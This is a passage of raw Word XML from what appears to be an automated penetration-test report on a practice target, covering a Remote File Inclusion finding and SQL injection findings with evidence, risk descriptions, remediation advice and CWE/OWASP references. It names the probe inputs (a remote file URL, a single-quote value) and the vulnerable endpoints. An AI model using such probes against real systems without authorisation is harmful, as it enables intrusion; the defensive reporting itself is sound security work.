          <w:p w14:paraId="601456B7"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0F2BE89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56AF7B9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43AE4222" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>page</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4CA316D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286EBAF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D0C5199"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remote file URL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>https://pentest-tools.com/file.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>page query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> resulted in the content of the remote file being present in the response.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId13">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27AF77FE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="119B0EDD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0495E19F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the target web application is vulnerable to Remote File Inclusion (RFI) attacks. This vulnerability occurs when the application allows external files to be included and executed within its environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FD401F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029190F3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk varies greatly, depending on the behaviour of programming language used on the server. The impact can range from client side vulnerabilities, like Cross-Site Scripting, to server side issues, like Remote Code Execution. If the programming language functionality used to import the resource just embeds the remote file content in the HTTP response, you are looking at impact on the client-side. On the other hand, if the content is treated and interpreted as code on the server, you are potentially dealing with Remote-Code Execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257269C9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150FDA5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The most effective solution to eliminating file inclusion vulnerabilities is to avoid passing raw user-submitted input to any filesystem API. If this is not possible, the application can maintain a white list of files that may be included by the page, and then check to see if the user input matches against any of the entries in the white list. Any request containing an invalid identifier has to be rejected. In this way, there is no attack surface for malicious users to manipulate the path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F6136" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE105EB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CACF624"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4E152C97"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26BA0E4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16080E31" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="121EA89C" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D5C7EF0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="007E8E1D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId15">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-94</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6FC68BAF" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D371362" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04EF6A1D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId16">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6E3E833E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE9BEC6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="584871B1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId17">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A3 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F3DC999" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306BD7F6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4379B997" wp14:editId="2FD1C14E">
            <wp:extent cx="5852160" cy="329184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5852160" cy="3291840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448C911" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Remote File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67565CB4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772F42D3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2385E5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD49BF3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.2 SQL Injection </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="27A77CA0" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="136F9990" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B62EC73" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="5D15C806" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF192F2" wp14:editId="7A9F1DEF">
                  <wp:extent cx="1397000" cy="1397000"/>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68CF5375" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F64D5EC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="3A6FA9BC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74C19840"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2763"/>
        <w:gridCol w:w="7087"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="351EE28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1FACCE8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D93AB49"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
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/brute/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="00CB27F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CE5ABDC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11FF0E10"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45DE4FA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CC8483B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A87C6B0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>username</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="32FC836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CA37A22" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269165D6"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value </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>username query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> generated the following error(s) in the response:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&lt;b&gt;Fatal error&lt;/b&gt;:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '627c0d05c087944c97a1f57d535ca4b7'' at line 1 in /var/www/html/vulnerabilities/brute/source/low.php:13</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId20">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C49FD42" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="7089"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="05956B5D" w14:textId="77777777" w:rsidTr="005838D5">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3363" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D858399" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66166E61"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1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/sqli_blind/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1FE80A78" w14:textId="77777777" w:rsidTr="005838D5">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3363" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50448662" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FE42EE5"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16F420E4" w14:textId="77777777" w:rsidTr="005838D5">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3363" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E65A10" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5719E1B1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="59499771" w14:textId="77777777" w:rsidTr="005838D5">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="3363" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9E7949" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109FB0AD"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value </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>id query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> generated the following error(s) in the response:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&lt;b&gt;Fatal error&lt;/b&gt;:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1d3d2d231d2dd4''' at line 1 in /var/www/html/vulnerabilities/sqli_blind/source/low.php:12</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId22">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7743A589" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="793270A7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18A87D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We found that the web application is vulnerable to SQL Injection attacks in its database query handling. The vulnerability is caused by improper input sanitization and allows an attacker to inject arbitrary SQL commands and execute them directly on the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10047398" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D339D4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that an attacker gains unauthorized access to the information from the database of the application. He could extract and alter information such as: application usernames, passwords, client information and other application specific data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E48EA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33201D1D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend implementing a validation mechanism for all the data received from the users.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>The best way to protect against SQL Injection is to use prepared statements for every SQL query performed on the database.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Otherwise, the user input can also be sanitized using dedicated methods such as: mysqli_real_escape_string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7209AEC9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78833945" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/SQL_Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D390D9E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70CC427C"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4D928AE0"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671F71F3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C636E7D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0C1662D7" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E68892" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1210AB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId25">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-89</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2F654A9E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DA892D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47CD7098" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId26">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Injection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="52359774" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BEC493E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12C2B20F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
